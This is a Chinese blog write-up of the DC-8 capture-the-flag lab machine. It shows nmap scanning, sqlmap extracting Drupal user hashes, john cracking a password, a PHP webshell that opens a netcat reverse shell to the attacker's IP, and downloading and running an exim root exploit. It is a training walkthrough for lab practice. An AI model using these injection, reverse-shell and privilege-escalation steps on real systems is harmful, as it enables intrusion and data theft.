DC-8靶机练习

本文详述了一次渗透测试的过程,从扫描存活主机和开放端口,发现Drupal框架的网站,到利用SQL注入漏洞获取数据库信息,通过john解密密码,再到反弹shell并寻找SUID权限的程序,最终成功获取Root权限并找到flag。过程中涉及了nmap、sqlmap、john等工具的使用。
摘要由CSDN通过智能技术生成

KALI:192.168.78.131
靶机:192.168.78.141

查询存活主机,扫面开放端口:

ifconfig
nmap -sP 192.168.78.0/24 
nmap -p 1-65535 -A -sV 192.168.78.140

在这里插入图片描述
访问80端口:

在这里插入图片描述
采用的是Durpal框架,该框架在DC-1系列也出现过。
那这里先扫描一下域名,再看下服务,最后再MSF查询

dirsearch发现一个登录界面

在这里插入图片描述
访问登陆界面:

在这里插入图片描述
考虑到爆破 先查询一下MSF该框架有无漏洞

在这里插入图片描述
都不能使用

再次看看开放的业务,发现sql注入:

在这里插入图片描述
很明显的SQL注入漏洞,直接上sqlmap

sqlmap -u http://192.168.43.18/?nid=0%27 --dbs

在这里插入图片描述
发现数据库 d7db 继续爆表

sqlmap -u "http://192.168.78.141/?nid=2" -D d7db --tables

在这里插入图片描述
找到users ,继续爆字段

sqlmap -u "http://192.168.78.141/?nid=2" -D d7db -T users --columns

在这里插入图片描述
发现 name和pass的字段

sqlmap -u http://192.168.78.141/?nid=2 -D d7db -T users -C name,pass --dump

在这里插入图片描述

很显然需要john解密

在这里插入图片描述
拿到密码 :turtle
去登陆,浏览下业务
在这里插入图片描述
写个shell

<p> this is a test </p>
<?php
system("nc -e /bin/bash 192.168.182.137 2333");
?>

反弹成功

python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

查看suid

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

发现可疑目标

在这里插入图片描述
查询一下本机的版本

exim --version

在这里插入图片描述
查询POC

searchexploit exim 4

在这里插入图片描述
开启FTP,把脚本文件上传到靶机/tmp目录即可

在这里插入图片描述

FTP连接,发现靶机没有开启FTP服务

在这里插入图片描述
那就开启端口,并且把46996.sh放到/tmp目录下


python -m SimpleHTTPServer 8000

wget http://192.168.78.131:8000/46996.sh

再下载之前先对46996.sh进行编辑

: set ff =unix  使windows的代码可以在unix上运行 #除了这种方法的话下面这种可以
dos2unix 46996.sh #将文件转换成unix格式

然后下载执行即可

chmod +x 46996.sh
./46996.sh -m netcat

在这里插入图片描述
拿到Root权限
查找一个flag的位置

find / -name "*lag*" 2> /dev/null

在这里插入图片描述拿到flag

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值